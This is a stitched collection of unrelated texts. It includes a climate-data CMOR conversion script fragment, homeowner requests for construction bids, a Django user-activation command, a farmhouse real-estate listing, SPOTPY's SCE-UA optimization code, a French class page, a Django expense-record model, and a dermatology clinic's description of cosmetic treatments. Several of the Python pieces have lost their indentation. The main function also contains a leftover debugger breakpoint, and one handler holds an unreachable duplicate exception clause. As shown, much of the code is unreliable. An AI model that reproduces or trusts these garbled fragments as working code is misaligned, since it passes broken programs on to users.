            lev=cdms2.createAxis( levels )
            lev.designateLevel()
            lev.units="pa"
            lev.long_name=data.getLevel().long_name
            #lev.id="lev"
            #lev=data.getAxis(1)
            #lev.__setattr__('_data_',dataLevels.astype(float))
            #lev.__setattr__('units',"Pa")
            #lev.units="hPa"
            data2=data.pressureRegrid(lev)
            return data2
        if( rc['cvrt_level'].split(':')[1] == "CMIP5" ):
            # Keep only the levels listed in the CMOR table; the axis is
            # built in the file's own units, then scaled back to Pa below.
            lev=cdms2.createAxis( [ float(item/LevelScaleFactor)
                                    for item in dataLevels
                                    if item in oTable.dico['levels' ] ] )
            lev.designateLevel()
            lev.units="pa"
            lev.long_name = data.getLevel().long_name
            data2=data.pressureRegrid(lev)
            lev[:]=lev[:]*LevelScaleFactor
            return data2
        else:
            # -----------------------
            # Assume a list of values
            # -----------------------
            levels = rc['cvrt_level'].split(':')[1].split(",")
            # --------------------------
            # Change units to Pascal
            # ---------------------------
            dataLevels = [ float(rc['cvrt_level'].split(":")[1].split(",")[i]) * \
                           LevelScaleFactor for i in range(len(levels)) ]
            # -----------------------------------
            # Match dataLevels with CMIP5 levels
            # Use file units
            # -----------------------------------
            lev=cdms2.createAxis( [ float(item/LevelScaleFactor)
                                    for item in dataLevels
                                    if item in oTable.dico['levels' ] ] )
            # -----------------------------------
            # Set axis metadata
            # -----------------------------------
            lev.units="pa"
            lev.long_name = data.getLevel().long_name
            lev.designateLevel()
            # -----------------------------------
            # Extract specified levels
            # -----------------------------------
            data2=data.pressureRegrid(lev)
            # -----------------------------------
            # Scale data back
            # -----------------------------------
            lev[:]=lev[:]*LevelScaleFactor
            return data2
    return data
# ********************************************************************
#
# createAxes()
#
# Define axes required by cmor and add z axis to data if needed
#
# ********************************************************************
def createAxes(rc, latvals, lonvals, data):
    """
    Build the list of keyword dictionaries passed to cmor.axis()
    (time/latitude/longitude plus an optional vertical axis) and add an
    axis to *data* when required.  Returns (axes, data).
    """
    # ---------------------------------------------
    # Create time/lat/lon axes using a dictionary
    # ---------------------------------------------
    axes = [
        {'table_entry' : 'time',
         'units'       : rc['OutputTimeUnits']},
        {'table_entry' : 'latitude',
         'units'       : 'degrees_north',
         'coord_vals'  : latvals,
         'cell_bounds' : latvals.getBounds()},
        {'table_entry' : 'longitude',
         'units'       : 'degrees_east',
         'coord_vals'  : lonvals,
         'cell_bounds' : lonvals.getBounds()},
        ]
    # NOTE(review): fill_value is captured here but never used in this
    # function -- presumably a leftover; the caller reads data.fill_value
    # itself before calling createAxes.
    fill_value = data.fill_value
    if( rc['cvrt_level'] == 'height2m' ):
        # Scalar 2 m height axis; the data gets a trailing singleton
        # dimension to match the extra axis.
        axes.append({'table_entry' : 'height2m',
                     'units'       : 'm',
                     'coord_vals'  : [2.0] })
        data = numpy.array(data[:])
        data = data[:,:,:,numpy.newaxis]
    elif( rc['cvrt_level'] != '' ):
        # Pressure levels: regrid onto the CMIP5 mandatory levels and
        # insert the plevs axis after time.
        data = getCMIP5lev( data, rc )
        levels=data.getLevel()[:]
        axes = numpy.insert(axes, 1,
                            {'table_entry' : 'plevs',
                             'units'       : 'Pa',
                             'coord_vals'  : levels })
    return axes, data
# ********************************************************************
#
# usage()
#
# ********************************************************************
def usage(message):
'''
Describe program synopsis.
'''
print
print "*************************"
print message
print "*************************"
print
print
print "obs4MIPS_process.py [-h] -r resource"
print " resource: File containing Global attributes"
print ""
print "obs4MIPS will convert an input data file into CMIP5 format using "
print "CMOR. A directory path will be creating using CMOR by default or "
print "using a template provided in the resource file."
print
# ********************************************************************
#
# main()
#
# ********************************************************************
def main():
'''
'''
pdb.set_trace()
try:
opts, args = getopt.getopt(sys.argv[1:], "hy:r:x:",
["help" ,"year=","resource=","excel="])
except getopt.GetoptError, err:
usage(str(err))# will print something like "option -a not recognized"
return(2)
# --------------------------
# Verify passed arguments
# --------------------------
year = -1
resource = None
excel = None
for o, a in opts:
if o in ("-r", "--resource"):
resource = a
elif o in ("-x", "--excel"):
excel = a
elif o in ("-h", "--help"):
usage()
return(0)
elif o in ("-y", "--year"):
yr = a
else:
assert False, "unhandled option"
# ------------------------------
# Does the resource file exist?
# ------------------------------
if( ((resource == None ) or ( not os.path.isfile( resource ) )) and (( excel == None ) or ( not os.path.isfile( excel ) )) ):
usage("bad Input Resource/Excel File")
return 1
# -----------------------
# Read in "rc" file
# -----------------------
if( resource ):
rc = ESGFresources( resource )
if( excel ):
rc = ESGFexcel( excel )
# --------------------------------
# Extract CMIP5 Table information
# --------------------------------
oTable = CMORTable(rc['inpath'], rc['table'])
if( not 'original_var' in rc.resources.keys() ):
sys.exit(-1)
rc['project_id'] = oTable[ 'project_id' ]
rc['product'] = oTable[ 'product' ]
rc['modeling_realm'] = oTable[ 'modeling_realm' ]
rc['frequency'] = oTable[ 'frequency' ]
if( process(rc) ):
return -1
return 0
# ********************************************************************
#
# Call main program and return exit code
#
# ********************************************************************
# Run the converter when invoked as a script and propagate main()'s
# integer return value as the process exit status.
if __name__ == '__main__':
    sys.exit(main())
|
Want to install a 3-car garage with pad. Attached preferred, but will consider a breezeway on recommendation.
Plan is viewable online see "Architects Northwest" Plan M3040A3F-0. New construction to be built in the town of Orting Wa. 148th ave e.Will accept separate bids for foundation, Framing, etc. Or the entire house.
Bathroom needs to be gutted and totally redone. There is a lot of water damage and it needs to be rearranged to put in a standing shower instead of a bathtub.
This is for a SHOP only. 30 feet X 40 feet. Hardi-plank lap siding, comp roof, cement floor, 3 - 10 foot garage doors, electrical, plumbing.
I need a projected estimate of how much you think it will cost to build a 4044 sq. ft. home on land where you are already building.
one level ranch style home, stucco exterior, terra cotta roof, on slab, 1500 total square feet living area, 3 bedroom, 2 bath, tile floors, bedrooms carpet, porch across front of house, no garage.
one level ranch style home, stucco exterior, terra cotta roof, on slab, 3 bedroom, 2 bath, tile floors, bedrooms carpet, porch across front of house, no garage.
I want to rebuild 5 row houses located on 8th Pine, Wilmington, De. Everything needs to be rebuilt and replaced I mean everything. I would also like to tear down the existing room additions that are attached on each house.
New sun room where deck is now, deck extended full length of house with jacuzzi in the middle. Large window in Master bedroom converted to a door with access to new deck. Also remove glass from master bathroom and replace with glass block.
we would like to add a master bedroom and bath suite onto our additional home, behind the garage which is covered with an existing concrete patio.Yard has a slight slope.
Story & 1/2 home. Kitchen/Dining(225sf), Living room(300sf), Master Bedroom(275sf), Laundry and Bath on ground floor; 2 or 3 Bedrooms and Bath upstairs. Concrete Foundation w/1 car garage under house. Covered porch across front.
we need to install an egress escape window in our basement. We currently have blocked glass, and will need to cut through concrete and install window,and window well.
The basement is not finished, but we plan to in the near future.
There is presently one floor. I Would like to add an additional floor. The home is presently a small bungalow with a full basement and one main floor.
I am trying to get bids on adding a room to our existing house - who in the area performs that type of work?
900sf cottage to be built in back of existing acreage home. 1-2 bedrooms, 1 bath, kitchen, great room, porch.
Prefer a mostly brickk home, with 3 bedrooms, two baths. Tile flooring in kitchen,laundry room, and bath rooms. Jacuzzi tub in master bath. Around 2,000 to 2,200 square foot.
I HAVE PLANS FOR A 1780 S.F. HOME.THIS HOME WILL BE BUILT ON THE EAST SIDE OF THE LAKE.
i am looking to have 2 addons to an existing structure. i basically need shells built, with roofs. i can do the inside work of drywall,and finishing.
I want to convert an unfinished 360 sq ft above-garage bonus room into a studio apartment. Room is studded out, with wiring. Needs plumbing, drywall, ceiling etc.
I have an unfinished walk-out basement, studded out. I would like to finish out approx. 1/2 (two rooms, closet and hallway) for an office and rec. room. Needs drywall, electrical, drop ceiling, etc.
I want an estimate (can be a vague one) on building a property. Specs. and plans are listed.
1- 20'by 20' addition off back of house on cinder blocks. 1- 20' by 24' garage attached to side of house.
ICF ext. walls, conc. slab, conc. roof tile, stucco exterior, stained conc. floors, detached garage (wood frame).
New two stall car gargage on cement slab. No interior work, rough framing only. Door/s/ provided.
We are curious about building costs per square foot in the Ruidoso, NM area--we want a small (1200 sq. ft.) cabin type second home.
A new construction of a living room 20x25 with a fire place and in that space a bathroom of 6x8 ft. This will be the new entrance of the house.
1700 sqft.3 brdroom 2 bath Wheelchair access shower, no steps.Master bed and bath a little larger for access.
Need to finish off a basement. Would like to have a bathroom and two large living areas.
Replace an existing 1200 sq. foot deck with composite materials and vinyl rails. We would like to have the deck done over the summer.
Total living area:1800 with around 250 sq ft unfinished bonus area over garage.
Start and finish dates are flexible.
I'd like to finish my basement. House built in 2001. I also want to add in extra large window for my family room. I could use both quotes for low-inexpensive materials, with ok workmanship as well as medium-good materials. Thanks.
We are looking at installing a deck in our back yard. No railing is needed but we would like a built-in bench of some sort. The deck will be no larger than 10 x 15 feet. We only require steps on one side of the deck.
Apply 400 sg ft of cultured stone to new fireplace in center of home.All interior work except 75 sg ft on roof top chimmney.Will purchase stone....but need mason to apply and grout.
Apply 400 sg ft of cultured to new fireplace in center of home.All interior work except 75 sg ft on roof top chimmney.Will purchase stone....but need mason to apply and grout.
Approx. 14x20 storage building, either concrete floored or raised wood floor (depending on price). Vinyl siding. At least one door large enough to accommodate a riding lawn mower.
Do not want barn-style roof.
complete home that is 80% complete.finish bricklaying, concrete slab in 3car garage,soffits, insulation, drywall and floors. house roughed for elect. and plumbing. need finish grading and cleanup. 3200 sq. ft.
I am looking to have deck put on with a screened in three season porch below. The dimensions would be about 20x20 for both.
New construction--need bids for site prep, plumbing, electrical, foundation, metal roof installation, exterior rock/masonry. Contact if interested, will furnish plans.
Carport convert to Den with bathroom.
|
from django.core.management.base import BaseCommand
from django.contrib.auth.models import User
from optparse import make_option
import datetime
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option("-u", "--username", dest="username", nargs=1, help="Specify user id or username"),
)
def handle(self, *args, **options):
username = options.get('username')
user = None
if username:
try:
user = User.objects.get(username__icontains=username)
except User.MultipleObjectsReturned:
user = User.objects.get(username__iexact=username)
except User.DoesNotExist:
user = User.objects.get(email__iexact=username)
except User.DoesNotExist:
print " ---> No user found at: %s" % username
if user:
user.profile.activate_free()
user.profile.save()
else:
print " ---> No user found at: %s" % (username)
|
Want peace and quiet? Want room to roam? You must see this charming 3 bedroom, 2 bath home situated on 20+ acres. Very nice home with recent upgrades done, large covered front porch and large back deck. Large basement for storage and parking as well. Beautiful land with approximately 6.5 acres of pasture and the balance sparsely wooded. A wonderful place to call home and only minutes to I-81.
Stan shares the company's goal of being the most professional, committed and personalized real estate company in the area we serve. Stan consistently ranks 1st or 2nd in the local board in listings sold. He has a unique style of individualized marketing unsurpassed by any local realtor, and amazing compassion for his vast clientele, making every customer know they are most important to his personal and company success.
|
# -*- coding: utf-8 -*-
'''
Copyright (c) 2015 by Tobias Houska
This file is part of Statistical Parameter Estimation Tool (SPOTPY).
:author: Tobias Houska and Stijn Van Hoey
This class holds the Shuffled Complex Evolution Algortithm (SCE-UA) algorithm, based on Duan (1994):
Duan, Q., Sorooshian, S. and Gupta, V. K.: Optimal use of the SCE-UA global optimization method for calibrating watershed models, J. Hydrol., 158(3), 265–284, 1994.
Based on Optimization_SCE
Copyright (c) 2011 Stijn Van Hoey.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from . import _algorithm
import spotpy
import numpy as np
import time
class sceua(_algorithm):
'''
Implements the SCE-UA algorithm from Duan (1994).
Input
----------
spot_setup: class
model: function
Should be callable with a parameter combination of the parameter-function
and return an list of simulation results (as long as evaluation list)
parameter: function
When called, it should return a random parameter combination. Which can
be e.g. uniform or Gaussian
objectivefunction: function
Should return the objectivefunction for a given list of a model simulation and
observation.
evaluation: function
Should return the true values as return by the model.
dbname: str
* Name of the database where parameter, objectivefunction value and simulation results will be saved.
dbformat: str
* ram: fast suited for short sampling time. no file will be created and results are saved in an array.
* csv: A csv file will be created, which you can import afterwards.
parallel: str
* seq: Sequentiel sampling (default): Normal iterations on one core of your cpu.
* mpc: Multi processing: Iterations on all available cores on your cpu (recommended for windows os).
* mpi: Message Passing Interface: Parallel computing on cluster pcs (recommended for unix os).
save_sim: boolean
*True: Simulation results will be saved
*False: Simulationt results will not be saved
alt_objfun: str or None, default: 'rmse'
alternative objectivefunction to be used for algorithm
* None: the objfun defined in spot_setup.objectivefunction is used
* any str: if str is found in spotpy.objectivefunctions,
this objectivefunction is used, else falls back to None
e.g.: 'log_p', 'rmse', 'bias', 'kge' etc.
'''
def __init__(self, *args, **kwargs):
    """
    Initialise the SCE-UA sampler; defaults the alternative objective
    function to 'rmse' unless the caller supplies one.
    """
    kwargs.setdefault('alt_objfun', 'rmse')
    super(sceua, self).__init__(*args, **kwargs)
def find_min_max(self):
    """
    Estimate parameter bounds empirically: draw 1001 random parameter
    sets and return their element-wise (minimum, maximum).
    """
    draws = self.parameter()['random']
    for _ in range(1000):
        draws = np.column_stack((draws, self.parameter()['random']))
    return np.amin(draws, axis=1), np.amax(draws, axis=1)
"""
def simulate(self,params):
if self.repeat.phase=='burnin':
id,params = params
simulations =
"""
def simulate(self,id_params_tuple):
    """This overwrites the simple wrapper function of _algorithms.py
    and makes a two phase mpi parallelization possible:
    1) burn-in
    2) complex evolution

    In the burn-in phase *id_params_tuple* is ``(id, params)`` and the
    model is simply evaluated.  In the complex-evolution phase it carries
    the shared SCE state; one complex is evolved for ``nspl`` steps and
    the updated complex plus bookkeeping lists are returned.
    """
    if not self.repeat.phase: #burn-in
        id,params = id_params_tuple
        return id,params,self.model(params)
    else:#complex-evolution
        igs,x,xf,icall,cx,cf,sce_vars= id_params_tuple
        self.npg,self.nopt,self.ngs,self.nspl,self.nps,self.bl,self.bu, self.status = sce_vars
        # Partition the population into complexes (sub-populations);
        # cx=np.zeros((self.npg,self.nopt))
        # cf=np.zeros((self.npg))
        #print(igs)
        # Members of complex igs are every ngs-th element of the full
        # population, starting at offset igs.
        k1=np.arange(self.npg,dtype=int)
        k2=k1*self.ngs+igs
        cx[k1,:] = x[k2,:]
        cf[k1] = xf[k2]
        # Evolve sub-population igs for self.self.nspl steps:
        likes=[]
        sims=[]
        pars=[]
        # NOTE(review): xrange is Python-2 only; this module predates
        # Python 3 support.
        for loop in xrange(self.nspl):
            # Select simplex by sampling the complex according to a linear
            # probability distribution
            lcs=np.array([0]*self.nps)
            lcs[0] = 1
            for k3 in range(1,self.nps):
                for i in range(1000):
                    #lpos = 1 + int(np.floor(self.npg+0.5-np.sqrt((self.npg+0.5)**2 - self.npg*(self.npg+1)*np.random.random())))
                    lpos = int(np.floor(self.npg+0.5-np.sqrt((self.npg+0.5)**2 - self.npg*(self.npg+1)*np.random.random())))
                    #idx=find(lcs(1:k3-1)==lpos)
                    idx=(lcs[0:k3]==lpos).nonzero() # check whether this element was already chosen
                    if idx[0].size == 0:
                        break
                lcs[k3] = lpos
            lcs.sort()
            # Construct the simplex:
            s = np.zeros((self.nps,self.nopt))
            s=cx[lcs,:]
            sf = cf[lcs]
            snew,fnew,icall,simulation = self._cceua(s,sf,icall)
            likes.append(fnew)
            pars.append(list(snew))
            self.status(igs,-fnew,snew)
            sims.append(list(simulation))
            #self.datawriter.save(-fnew,list(snew), simulations = list(simulation),chains = igs)
            # Replace the worst point in Simplex with the new point:
            s[-1,:] = snew
            sf[-1] = fnew
            # Replace the simplex into the complex;
            cx[lcs,:] = s
            cf[lcs] = sf
            # Sort the complex;
            idx = np.argsort(cf)
            cf = np.sort(cf)
            cx=cx[idx,:]
        # Replace the complex back into the population;
        return igs,likes,pars,sims,cx,cf,k1,k2
def sample(self,repetitions,ngs=20,kstop=100,pcento=0.0000001,peps=0.0000001):
    """
    Samples from parameter distributions using SCE-UA (Duan, 2004),
    converted to python by Van Hoey (2011).

    Parameters
    ----------
    repetitions: int
        maximum number of function evaluations allowed during optimization
    ngs: int
        number of complexes (sub-populations), take more then the number of
        analysed parameters
    kstop: int
        maximum number of evolution loops before convergency
    pcento: int
        the percentage change allowed in kstop loops before convergency
    peps: float
        Convergence criterium
    """
    # Initialize the Progress bar
    starttime    = time.time()
    intervaltime = starttime
    # Initialize SCE parameters:
    self.ngs=ngs
    randompar=self.parameter()['random']
    self.nopt=randompar.size
    self.npg=2*self.nopt+1    # members per complex
    self.nps=self.nopt+1      # points per simplex
    self.nspl=self.npg        # evolution steps per complex
    npt=self.npg*self.ngs     # total population size
    self.iseed=1
    self.bl,self.bu = self.parameter()['minbound'],self.parameter()['maxbound']
    bound = self.bu-self.bl  #np.array
    # Create an initial population to fill array x(npt,self.self.nopt):
    x=self._sampleinputmatrix(npt,self.nopt)
    #Set Ininitial parameter position
    #iniflg=1
    nloop=0
    icall=0
    xf=np.zeros(npt)
    #Burn in
    # NOTE(review): xrange is Python-2 only; this module predates Python 3
    # support.
    param_generator = ((rep,list(x[rep])) for rep in xrange(int(npt)))
    for rep,randompar,simulations in self.repeat(param_generator):
        #Calculate the objective function
        like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
        #Save everything in the database
        self.status(rep,-like,randompar)
        xf[rep] = like
        self.datawriter.save(-like,randompar,simulations=simulations)
        icall += 1
        #Progress bar
        acttime=time.time()
        if acttime-intervaltime>=2:
            text='%i of %i (best like=%g)' % (rep,repetitions,self.status.objectivefunction)
            print(text)
            intervaltime=time.time()
    # Sort the population in order of increasing function values;
    idx = np.argsort(xf)
    xf = np.sort(xf)
    x=x[idx,:]
    # Record the best and worst points;
    bestx=x[0,:]
    bestf=xf[0]
    #worstx=x[-1,:]
    #worstf=xf[-1]
    BESTF=bestf
    BESTX=bestx
    ICALL=icall
    # Compute the standard deviation for each parameter
    #xnstd=np.std(x,axis=0)
    # Computes the normalized geometric range of the parameters
    gnrng=np.exp(np.mean(np.log((np.max(x,axis=0)-np.min(x,axis=0))/bound)))
    # Check for convergency;
    if icall >= repetitions:
        print('*** OPTIMIZATION SEARCH TERMINATED BECAUSE THE LIMIT')
        print('ON THE MAXIMUM NUMBER OF TRIALS ')
        print(repetitions)
        print('HAS BEEN EXCEEDED. SEARCH WAS STOPPED AT TRIAL NUMBER:')
        print(icall)
        print('OF THE INITIAL LOOP!')
    if gnrng < peps:
        print('THE POPULATION HAS CONVERGED TO A PRESPECIFIED SMALL PARAMETER SPACE')
    # Begin evolution loops:
    nloop = 0
    criter=[]
    criter_change=1e+5
    starttime=time.time()
    intervaltime=starttime
    acttime=time.time()
    self.repeat.setphase('ComplexEvo')
    while icall<repetitions and gnrng>peps and criter_change>pcento:
        nloop+=1
        #print nloop
        #print 'Start MPI'
        # Loop on complexes (sub-populations);
        cx=np.zeros((self.npg,self.nopt))
        cf=np.zeros((self.npg))
        sce_vars=[self.npg,self.nopt,self.ngs,self.nspl,self.nps,self.bl,self.bu, self.status]
        param_generator = ((rep,x,xf,icall,cx,cf,sce_vars) for rep in xrange(int(self.ngs)))
        for igs,likes,pars,sims,cx,cf,k1,k2 in self.repeat(param_generator):
            icall+=len(likes)
            x[k2,:] = cx[k1,:]
            xf[k2] = cf[k1]
            for i in range(len(likes)):
                self.status(icall,-likes[i],pars[i])
                self.datawriter.save(-likes[i],list(pars[i]), simulations = list(sims[i]),chains = igs)
            #Progress bar
            acttime=time.time()
            if acttime-intervaltime>=2:
                text='%i of %i (best like=%g)' % (icall,repetitions,self.status.objectivefunction)
                print(text)
                intervaltime=time.time()
        # End of Loop on Complex Evolution;
        # Shuffled the complexes;
        idx = np.argsort(xf)
        xf = np.sort(xf)
        x=x[idx,:]
        # Record the best and worst points;
        bestx=x[0,:]
        bestf=xf[0]
        #worstx=x[-1,:]
        #worstf=xf[-1]
        BESTX = np.append(BESTX,bestx, axis=0) # appended here; reshaped at the end!
        BESTF = np.append(BESTF,bestf)
        ICALL = np.append(ICALL,icall)
        # Computes the normalized geometric range of the parameters
        gnrng=np.exp(np.mean(np.log((np.max(x,axis=0)-np.min(x,axis=0))/bound)))
        # Check for convergency;
        if icall >= repetitions:
            print('*** OPTIMIZATION SEARCH TERMINATED BECAUSE THE LIMIT')
            print('ON THE MAXIMUM NUMBER OF TRIALS ')
            print(repetitions)
            print('HAS BEEN EXCEEDED.')
        if gnrng < peps:
            print('THE POPULATION HAS CONVERGED TO A PRESPECIFIED SMALL PARAMETER SPACE')
        criter=np.append(criter,bestf)
        if nloop >= kstop: # needed so that at least kstop loops are executed
            criter_change= np.abs(criter[nloop-1]-criter[nloop-kstop])*100
            criter_change= criter_change/np.mean(np.abs(criter[nloop-kstop:nloop]))
            if criter_change < pcento:
                text='THE BEST POINT HAS IMPROVED IN LAST %d LOOPS BY LESS THAN THE THRESHOLD %f' %(kstop,pcento)
                print(text)
                print('CONVERGENCY HAS ACHIEVED BASED ON OBJECTIVE FUNCTION CRITERIA!!!')
    # End of the Outer Loops
    text='SEARCH WAS STOPPED AT TRIAL NUMBER: %d' %icall
    print(text)
    text='NORMALIZED GEOMETRIC RANGE = %f' %gnrng
    print(text)
    text='THE BEST POINT HAS IMPROVED IN LAST %d LOOPS BY %f' %(kstop,criter_change)
    print(text)
    #reshape BESTX
    # NOTE(review): the module imports division from __future__, so
    # BESTX.size/self.nopt is true division and reshape receives a float;
    # presumably integer division (//) is intended -- confirm.
    BESTX=BESTX.reshape(BESTX.size/self.nopt,self.nopt)
    self.repeat.terminate()
    try:
        self.datawriter.finalize()
    except AttributeError: #Happens if no database was assigned
        pass
    print('Best parameter set')
    print(self.status.params)
    text='Duration:'+str(round((acttime-starttime),2))+' s'
    print(text)
def _cceua(self,s,sf,icall):
# This is the subroutine for generating a new point in a simplex
#
# s(.,.) = the sorted simplex in order of increasing function values
# s(.) = function values in increasing order
#
# LIST OF LOCAL VARIABLES
# sb(.) = the best point of the simplex
# sw(.) = the worst point of the simplex
# w2(.) = the second worst point of the simplex
# fw = function value of the worst point
# ce(.) = the centroid of the simplex excluding wo
# snew(.) = new point generated from the simplex
# iviol = flag indicating if constraints are violated
# = 1 , yes
# = 0 , no
self.nps,self.nopt=s.shape
alpha = 1.0
beta = 0.5
# Assign the best and worst points:
sw=s[-1,:]
fw=sf[-1]
# Compute the centroid of the simplex excluding the worst point:
ce= np.mean(s[:-1,:],axis=0)
# Attempt a reflection point
snew = ce + alpha*(ce-sw)
# Check if is outside the bounds:
ibound=0
s1=snew-self.bl
idx=(s1<0).nonzero()
if idx[0].size <> 0:
ibound=1
s1=self.bu-snew
idx=(s1<0).nonzero()
if idx[0].size <> 0:
ibound=2
if ibound >= 1:
snew = self._sampleinputmatrix(1,self.nopt)[0] #checken!!
## fnew = functn(self.nopt,snew);
simulations=self.model(snew)
like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
fnew = like#bcf.algorithms._makeSCEUAformat(self.model,self.observations,snew)
#fnew = self.model(snew)
icall += 1
# Reflection failed; now attempt a contraction point:
if fnew > fw:
snew = sw + beta*(ce-sw)
simulations=self.model(snew)
like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
fnew = like
icall += 1
# Both reflection and contraction have failed, attempt a random point;
if fnew > fw:
snew = self._sampleinputmatrix(1,self.nopt)[0] #checken!!
simulations=self.model(snew)
like = self.objectivefunction(evaluation = self.evaluation, simulation = simulations)
fnew = like#bcf.algorithms._makeSCEUAformat(self.model,self.observations,snew)
#print 'NSE = '+str((fnew-1)*-1)
#fnew = self.model(snew)
icall += 1
# END OF CCE
return snew,fnew,icall,simulations
def _sampleinputmatrix(self,nrows,npars):
'''
Create inputparameter matrix for nrows simualtions,
for npars with bounds ub and lb (np.array from same size)
distname gives the initial sampling ditribution (currently one for all parameters)
returns np.array
'''
x=np.zeros((nrows,npars))
for i in range(nrows):
x[i,:]= self.parameter()['random']
return x
# Matrix=np.empty((nrows,npars))
# for i in range(nrows):
# Matrix[i]= self.parameter()['random']
# return Matrix
|
Welcome to the French 11 section!
This page has links to each of the various pages in your section. You can also hover your mouse over "French 11" to see the pages available.
Description of homework? Assignment due dates? Click the image below.
Additional assignment info? Documents to download? Assignments to upload and send to me? Blague de la semaine? Click the image below.
Links to various websites? Click the image below.
|
import logging
from django.conf import settings
from django.contrib.postgres.fields import ArrayField
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from djmoney.models.fields import MoneyField
TRANSACTION_TYPE = (
('EXP', _('Expences')),
('INC', _('Income')),
)
log = logging.getLogger(__name__)
class Record(models.Model):
    """A single income/expense record belonging to one user.

    ``amount`` is a MoneyField (amount plus currency, CAD by default)
    and ``transaction_type`` marks the record as EXP (expenses) or
    INC (income).  Per-user tag usage frequencies are mirrored into a
    Redis sorted set (see ``redis_tags_key``).
    """
    user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
    tags = ArrayField(
        models.TextField(max_length=20), null=False, blank=True, default=list
    )
    amount = MoneyField(max_digits=15, decimal_places=2, default_currency='CAD')
    comment = models.TextField(null=True, blank=True)
    transaction_type = models.CharField(choices=TRANSACTION_TYPE, max_length=3)
    created_at = models.DateTimeField(default=timezone.now, blank=True)

    @property
    def redis_tags_key(self):
        """Redis key of the sorted set holding this user's tag frequencies."""
        return settings.REDIS_KEY_USER_TAGS % (self.user_id,)

    def __str__(self):
        return '%s %s' % (self.amount, ', '.join(self.tags))

    def remove_tags_weights(self):
        """Decrement this record's tags in the frequency sorted set."""
        log.debug('Remove tags weights')
        key = self.redis_tags_key
        pipe = settings.REDIS_CONN.pipeline()
        for tag in self.tags:
            pipe.zincrby(key, -1, tag)
        # Tags whose score dropped to zero are no longer used anywhere;
        # purge them so the set stays compact.
        pipe.zremrangebyscore(key, 0, 0)
        pipe.execute()

    def add_tags_weights(self):
        """Increment this record's tags in the frequency sorted set."""
        log.debug('Add tags weights')
        key = self.redis_tags_key
        pipe = settings.REDIS_CONN.pipeline()
        for tag in self.tags:
            pipe.zincrby(key, 1, tag)
        pipe.execute()
|
At Spring Street Dermatology, we work to optimize the appearance of your skin through comprehensive medical care and state of the art cosmetic enhancements. We believe in achieving natural results using the simplest, least invasive techniques possible. Our goal is to bring out the best in you. After all, when you look good, so do we!
Frowning, squinting and smiling leave behind fine lines and wrinkles over time. It can be injected directly with a tiny needle into the muscles responsible and work by reducing crease causing contractions. While neurotoxins help soften deep wrinkles, the ideal time for prevention is to start treatment when fine lines first appear. There is minimal discomfort and no downtime. Within days, you may see an improvement that can last up to 4 months. If there is concomitant volume loss, soft tissue fillers may be recommended for more complete correction.
Chemical peeling can reduce fine lines, improve the appearance of scars, diminish dark marks and enhance texture. The procedure involves applying a chemical solution that causes the top layers of the skin to exfoliate, allowing newer, revitalized skin to emerge. A peeling agent is chosen based on the specific skin condition being addressed, your skin type and the goals of treatment. You can expect to feel some warmth and mild stinging during the procedure. Whether you are looking for quick refreshment or a deeper, stronger peel, we will choose the safest and most effective option for your skin. Microdermabrasion may be added for enhanced results.
As we mature, loss of volume leads to wrinkles, prominent nasolabial folds, thinned lips, exaggerated jowls and marionette lines. The natural deterioration of underlying bone and soft tissue leaves a hollowed, aged appearance. Fillers are injected below the skin surface to correct age related volume loss. At Spring Street Dermatology, we use hyaluronic acid based fillers like Juvederm and Restylane to augment the cheeks, reduce wrinkles, enhance lips and give patients a natural, more youthful appearance. Hyaluronic acid based fillers are safest because they are a component of native connective tissue and are easily reversible.
Years of sun exposure can lead to sunspots, age spots, freckles and broken blood vessels. The red and brown tones make the skin appear aged and uneven. IPL turns back the hands of time by selectively destroying melanin (pigment) and hemoglobin (red blood cells). It can be used on the face, chest, arms, and hands. For patients with rosacea, IPL can be used to decrease background redness and help prevent flushing. The Cynosure MaxG offered at Spring Street Dermatology is the most powerful and effective IPL platform available.
Kybella™ is a prescription medicine used in adults to improve the appearance of submental fat, also called the “double chin.” The active ingredient in Kybella is deoxycholic acid, a naturally-occurring molecule in the body that aids in fat breakdown and absorption. When injected into the fat beneath your chin, Kybella causes the destruction of fat cells. Once destroyed, these cells can no longer store or accumulate fat. Multiple treatments are necessary for most patients. Final results can take over 6 weeks to be evident. After an ideal aesthetic response is achieved, retreatment is not expected.
Let’s face it – traditional hair removal techniques like waxing, threading, creams and shaving are torture. They can be painful, labor intensive and, if you do the math, extremely expensive over time. Laser hair removal offers permanent hair reduction for both men and women. With our Cynosure Elite Nd:YAG and Alexandrite lasers, all skin types and any area of the body can be treated. Pain is minimal and only lasts for a fraction of a second. The average patient will need 6-9 treatments at monthly intervals to achieve a 90% reduction in unwanted hair. Yearly touch ups are recommended to keep the hair away.
Laser resurfacing not only tightens the skin but can improve the appearance of sunspots, wrinkles, pores and scars. Ablative lasers work by vaporizing the outer layers of skin. This process stimulates the skin to repair and remodel with new collagen. Recovery time can take 1-2 weeks, but results are dramatic and lasting. Non-Ablative lasers are less invasive. They work by heating up tissue without actually destroying it. There is usually minimal downtime and multiple treatments are required for best results.
Using the top of the line ICON™ workstation, Spring Street Dermatology offers 3 types of laser resurfacing: 2940 ablative for a one time treatment with dramatic results, 1540 XD for acne and surgical scars, and 1540 XF for skin texture and stretch marks.
The Eclipse MicroPen™ uses a sterile 12 micro-needle tip to create controlled micro-channels in the skin. This initiates the skin’s repair process to naturally produce collagen, ideal for decreasing the appearance of wrinkles, fine lines, scars and stretch marks. The micro-channels also allow for optimal absorption of topical products, most importantly Platelet Rich Plasma (PRP), to enhance results. PRP is a concentration of platelets and growth factors found in the blood stream. To harness the reparative and regenerative power of PRP, a small blood sample is taken from your own body and centrifuged. The PRP, a clear golden liquid, is then extracted, applied topically and immediately followed by a micro-needling procedure. The micro-channels created by the Eclipse MicroPen provide direct pathways to the deeper layers of skin allowing the PRP to expedite wound healing and further stimulate production of collagen. Microneedling with PRP is an ideal, natural treatment for smoothing wrinkles, fine line, and scars. Coupled with injections of PRP, it can also be used to stimulate hair regrowth in the scalp.
